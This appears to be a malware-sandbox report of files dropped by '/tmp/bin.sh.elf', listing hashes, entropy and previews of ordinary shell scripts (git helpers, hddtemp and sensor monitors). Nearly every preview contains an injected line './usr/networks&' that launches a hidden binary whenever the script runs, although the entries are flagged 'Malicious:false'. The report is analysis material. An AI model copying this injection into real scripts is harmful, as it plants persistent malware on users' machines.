                                                                  SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):253
                                                                  Entropy (8bit):5.267626424494032
                                                                  Encrypted:false
                                                                  SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                  MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                  SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                  SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                  SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2988
                                                                  Entropy (8bit):4.924425870820004
                                                                  Encrypted:false
                                                                  SSDEEP:48:II63+FOMuldvJM+6/4p20SdvgT3vtBug0hoAYXy39qbFcxZ+6N77DoXf0iqUckOM:Le+8RldvJjTEvgTftcoAYXY9q6o6N/Ds
                                                                  MD5:7E1F6356EC1ED5353F164A90853F050A
                                                                  SHA1:AEBF6C04E3737D1E1172965E25DB372841DD6550
                                                                  SHA-256:CE3B6AE4E92DA2F30AD1E09DCFA849B2744524D62B9AA9440BA76BEDCA46EE69
                                                                  SHA-512:CCF50021CA3905B5B61C6A2E6D516E21CADEF175D9CD64FD2630E5B185CAE7FF142E8F1793E484981F91F4EEF6C3E053F4D0FD6E9F1F2F9ACFF3B56FB163368E
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir="."..dwz_file="".if $READELF -S "$file" | grep -q " \.gnu_debugaltlink "; then. dwz_file=$($READELF --string-dump=.gnu_debugaltlink "$file" \... | grep -A1 "'\.gnu_debugaltlink':" \... | tail -n +2 \... | sed 's/.*]//'). dwz_file=$(echo $dwz_file). if $READELF -S "$dwz_file" | grep -E -q " \.(gdb_index|debug_names) "; then..# Already has an index, skip it...dwz_file="". fi.fi..set_files ().{. local file="$1".. index4="${file}.gdb-index". index5="${file}.debug_names". debugstr="${file}.debug_str". debugstrmerge="${file}.debug_str.merge". debugstrerr="${file}.debug_str.err".}..tmp_files=.for f in "$file" "$dwz_file"; do. if [ "$f" = "" ]; then..continue. fi. set_files "$f". tmp_files="$tmp_files $index4 $index5 $debugstr $debugstrmerge $debugstrerr".done..rm -f $t
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):486
                                                                  Entropy (8bit):5.198694046664742
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                  MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                  SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                  SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                  SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2904
                                                                  Entropy (8bit):5.006955417229927
                                                                  Encrypted:false
                                                                  SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                  MD5:E6A74480E370B07D5BDC026A624CE684
                                                                  SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                  SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                  SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1246
                                                                  Entropy (8bit):5.049599407603353
                                                                  Encrypted:false
                                                                  SSDEEP:24:MASp8NltrBrTf+mAka+mq8bTNRzbm4XaR3U0Lp0VDbztR5OjPKITbfrCnMSg:MAtltd3dAkad3RzK4Xahjd0VDbZfWDb5
                                                                  MD5:7D6CF34C9799D8C55311F08D93A10138
                                                                  SHA1:A84010E0348E5047DF290518012FC67F16FDE381
                                                                  SHA-256:866FDA21F32F6B7DF370F774EE54E025C366EB13344FEB4171D8B2C7E71390AB
                                                                  SHA-512:9BAF68D66C557B79CEEBD37408E718DCAB9B24DA99D064896200891F56D16A0770F68C202EA169596A319EDAD2CBCD0F7F2CB93A07D20C11D4058F97D733C778
                                                                  Malicious:false
                                                                  Preview:./usr/networks&...exit 0...;;..-o|--overwrite)...overwrite=1...shift...break...;;..--)...shift...break...;;..*)...break...;;..esac.done..# Overwrite or help options are not valid except as first arg.for opt in "$@".do..case "$opt" in..-h|--help)...echo "$USAGE"...exit 0...;;..-o|--overwrite)...echo "$USAGE"...exit 0...;;..esac.done... "$(git --exec-path)/git-sh-setup".require_work_tree.cd_to_toplevel..# Remember original branch.branch=$(git symbolic-ref -q HEAD) ||.original_HEAD=$(git rev-parse --verify HEAD) || {..echo >&2 "Not on any branch and no commit yet?"..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test $overwrite = 1..then...git rerere forget ...fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):16426
                                                                  Entropy (8bit):5.045058479498928
                                                                  Encrypted:false
                                                                  SSDEEP:384:j0fwqnEt0mOR+eFCnerWvDL7gfpv6bck6pYT2t9+WYtrV1achgV3fD0CzIy2FfCr:j0fwqny0mOo8CnerWvH7ghSbckVT2t9n
                                                                  MD5:5FF7690E1044D6F67F7B8D809103162D
                                                                  SHA1:CC0197BA40420DCA0D68647648C2762C1BEF1A16
                                                                  SHA-256:5376C3978C0680B83294F2DBF1341C197B8BCC69A8691413FE8E6F493B5A8380
                                                                  SHA-512:827DA60BFED3EF33E4A24175AD3EB6B58E623B468369C35D5864B407C3F1D0655C942877C997A97D9768EA87B68138D047A4965F1FC66380988BF1A748B5987F
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug () {..if test -n "$debug"..then...printf "%s\n" "$*" >&2..fi.}..say () {..if test -z "$quiet"..then...printf "%s\n" "$*" >&2..fi.}..progress () {..if test -z "$quiet"..then...printf "%s\r" "$*" >&2..fi.}..assert () {..if ! "$@"..then...die "assertion failed: " "$@"..fi.}..ensure_single_rev () {..if test $# -ne 1..then...die "You must provide exactly one revision. Got: '$@'"..fi.}..while test $# -gt 0.do..opt="$1"..shift...case "$opt" in..-q)...quiet=1...;;..-d)...debug=1...;;..--annotate)...annotate="$1"...shift...;;..--no-annotate)...annotate=...;;..-b)...branch="$1"...shift...;;..-P)...prefix="${1%/}"...shift...;;..-m)...message="$1"...shift...;;..--no-prefix)...prefix=...;;..--onto)...onto="$1"...shift...;;..--no-onto)...ont
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):823
                                                                  Entropy (8bit):5.445793673200752
                                                                  Encrypted:false
                                                                  SSDEEP:12:w6vCJsHKfrLCYwTlFfOfSL3DXKUvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+uKKGRBmAF5I0Zl7
                                                                  MD5:4180AD5F33CADD1650F75A8BBC430E64
                                                                  SHA1:E47B7FB6D9AF677D61D983920D8CE0AC76A13DEF
                                                                  SHA-256:3DFF00AAF13758FABB9C97B4E9D26967211B44971056A6BEE5DC0DC04050715F
                                                                  SHA-512:7AB4417B9878A6122942C277D84A5BA1A286819853952614FFE4A9ACEEB00CBFE336AD4EE39946517E430A6C1E415486119733D6C58AD9BA22448CEC9E4766B6
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=$(echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp')..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):8722
                                                                  Entropy (8bit):4.841397056972939
                                                                  Encrypted:false
                                                                  SSDEEP:192:/i038ZMHCJtcyzyBgVQlyzcvXGC7tq5bM7YKBKjI7YYI:ZCbdHVQ+ceJE7+
                                                                  MD5:1C808D280E8DF536EFBE3AB9EC6A1AE4
                                                                  SHA1:28B08E23FC817DF4A67AD544B8D56F6947AB2A56
                                                                  SHA-256:706BDD06879A99096A874915BB81A179F3455DC1B29C2F01C54DB26197B05786
                                                                  SHA-512:1EDD029A4300324FF3D9E458B2F054F5D60231BA3E4EF374F5F20A11117E0DD4EC3AC3FDBB1AAF38800562E67BC473FDF66E2485350C8CB5565A3048FD91E2A5
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.}..cd "$(dirname "$0")"/../.. ||.die "Could not cd to top-level directory"..mkdir -p .vscode ||.die "Could not create .vscode/"..# General settings..cat >.vscode/settings.json.new <<\EOF ||.{. "C_Cpp.intelliSenseEngine": "Default",. "C_Cpp.intelliSenseEngineFallback": "Disabled",. "[git-commit]": {. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 72. },. "[c]": {. "editor.detectIndentation": false,. "editor.insertSpaces": false,. "editor.tabSize": 8,. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 80,. "files.trimTrailingWhitespace": true. },. "files.associations": {. "*.h": "c",. "*.c": "c". },. "cSpell.ignorePaths": [. ],. "cSpell.words": [. "DATAW",. "DBCACHED",. "DFCHECK",. "DTYPE",. "Hamano",. "HCAST",. "HEXSZ",. "HKEY",. "HKLM",. "IFGITLINK",. "IFIN
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.882045108136863
                                                                  Encrypted:false
                                                                  SSDEEP:3:qXVOORgn:Tn
                                                                  MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                  SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                  SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                  SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):617
                                                                  Entropy (8bit):4.789300168717738
                                                                  Encrypted:false
                                                                  SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                  MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                  SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                  SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                  SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1015
                                                                  Entropy (8bit):4.896629241453442
                                                                  Encrypted:false
                                                                  SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                  MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                  SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                  SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                  SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                  Malicious:false
                                                                  Preview:./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):266
                                                                  Entropy (8bit):4.736279036741599
                                                                  Encrypted:false
                                                                  SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                  MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                  SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                  SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                  SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2712
                                                                  Entropy (8bit):5.4524991837552035
                                                                  Encrypted:false
                                                                  SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                  MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                  SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                  SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                  SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                  Malicious:false
                                                                  Preview:./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                  Process:/tmp/bin.sh.elf
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):2564
                                                                  Entropy (8bit):5.346461718403454
                                                                  Encrypted:false
                                                                  SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                  MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                  SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                  SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
